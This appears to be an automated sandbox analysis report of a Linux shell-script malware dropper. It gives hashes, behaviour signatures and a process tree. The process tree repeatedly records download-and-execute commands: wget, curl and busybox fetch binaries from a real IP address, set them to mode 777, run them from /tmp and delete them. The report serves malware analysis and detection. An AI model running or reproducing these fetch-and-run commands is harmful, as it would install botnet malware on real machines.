Analysis
-
max time kernel
67s -
max time network
69s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipsel image:debian9-mipsel-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
19/10/2024, 01:51
Static task
static1
Behavioral task
behavioral1
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh
-
Size
10KB
-
MD5
6a9652c294e5e9472ed245126df7a12a
-
SHA1
6b6211e9cda29897067be245039e7aec7b482f0e
-
SHA256
79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7
-
SHA512
ebcee321431404cd9392dfec9d38e04b4cfc838bcb99512498730ea32d583d7690bcf26b0717df741102327d4f6330ca8730f3e433fd34db2250e20884c3db99
-
SSDEEP
192:2k07BhIIeyXF6IyR00QN+m0EX4q2Mk03BhISeyXF6I6i0QN+mlw:2k0BeyXoIyRlC4q2Mk0heyXoI6X
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh/tmp/79e44bd338732b2245e0eaaa5720123e4ed11f71a2f3747cf3f0ea58796ddcd7.sh1⤵PID:718
-
/bin/rm/bin/rm bins.sh2⤵PID:723
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:725
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:746
-
-
/bin/chmodchmod 777 SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi./SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:751
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:754
-
-
/bin/chmodchmod 777 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS./8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:757
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:758
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:760
-
-
/bin/chmodchmod 777 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb./4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:766
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:768
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:775
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:782
-
-
/bin/chmodchmod 777 D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- File and Directory Permissions Modification
PID:785
-
-
/tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz./D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- Executes dropped EXE
PID:787
-
-
/bin/rmrm D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:790
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:798
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:810
-
-
/bin/chmodchmod 777 pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- File and Directory Permissions Modification
PID:813
-
-
/tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm./pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- Executes dropped EXE
PID:814
-
-
/bin/rmrm pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:819
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:822
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:823
-
-
/bin/chmodchmod 777 JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ./JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- Executes dropped EXE
PID:825
-
-
/bin/rmrm JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:826
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:827
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:829
-
-
/bin/chmodchmod 777 FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- File and Directory Permissions Modification
PID:834
-
-
/tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V./FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- Executes dropped EXE
PID:835
-
-
/bin/rmrm FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:838
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:839
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:846
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:857
-
-
/bin/chmodchmod 777 yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN./yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:866
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:874
-
-
/bin/chmodchmod 777 vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I./vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:878
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:880
-
-
/bin/chmodchmod 777 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK./3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- Executes dropped EXE
PID:882
-
-
/bin/rmrm 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:883
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:884
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:886
-
-
/bin/chmodchmod 777 KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx./KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:889
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:890
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:892
-
-
/bin/chmodchmod 777 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS./4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:895
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:896
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:898
-
-
/bin/chmodchmod 777 eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz./eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:901
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:902
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:904
-
-
/bin/chmodchmod 777 JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav./JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:907
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:908
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:910
-
-
/bin/chmodchmod 777 KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx./KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm KCzhU8DZejg5hMGeh03Y535Qx5meF4eGMx2⤵PID:913
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:914
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:916
-
-
/bin/chmodchmod 777 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS./4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm 4zIBEz5S5fpw2blwM9yTx4PGvYFicMymKS2⤵PID:919
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:920
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:922
-
-
/bin/chmodchmod 777 eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz./eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm eRFLrhNsEEth1RdO3lfejGk7nCVWboY0kz2⤵PID:925
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:926
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:928
-
-
/bin/chmodchmod 777 JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav./JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm JAZsD2co6XSFbWQzMXLdnbSIU8GMjQvkav2⤵PID:931
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:932
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:934
-
-
/bin/chmodchmod 777 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK./3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm 3njsUuMiA9s4cD7gd54PP2mJQTVXXoG3iK2⤵PID:937
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:938
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:940
-
-
/bin/chmodchmod 777 SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi./SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm SLnrBHAIVHr4YfPMuHinLbYlvGPBQozryi2⤵PID:943
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:944
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:946
-
-
/bin/chmodchmod 777 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS./8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm 8WyymWHYj7QCTjKmhX97w2uKs3atZWewSS2⤵PID:949
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:950
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:952
-
-
/bin/chmodchmod 777 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb./4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm 4nLqolMkFfn5Q2QNB4qrSTSlHHPfu9kOkb2⤵PID:955
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:956
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:958
-
-
/bin/chmodchmod 777 D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz./D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm D6LuxfDpXNy9rxMbPnif7NLzSKpC22CCSz2⤵PID:961
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:962
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:964
-
-
/bin/chmodchmod 777 pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm./pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm pAmIB4sk5yCuRWIk7h1hYLhnwpUSlg4Xxm2⤵PID:967
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:968
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:970
-
-
/bin/chmodchmod 777 JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ./JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm JthsMXwzlHBXiVQeiqTBVfvcaP24dnBmuQ2⤵PID:973
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:974
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:976
-
-
/bin/chmodchmod 777 FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/FhITldMHonjpiCltv4sk55YKSWt040cZ3V./FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm FhITldMHonjpiCltv4sk55YKSWt040cZ3V2⤵PID:979
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:980
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:982
-
-
/bin/chmodchmod 777 yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN./yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm yRFx7dApmj2zj7WJZMzgClnjukSVEtqQpN2⤵PID:985
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:986
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:987
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:988
-
-
/bin/chmodchmod 777 vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I./vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵
- Executes dropped EXE
PID:990
-
-
/bin/rmrm vgeI6ZfhxHZrKSX06sG1p4uo4aUQzHZy5I2⤵PID:991
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97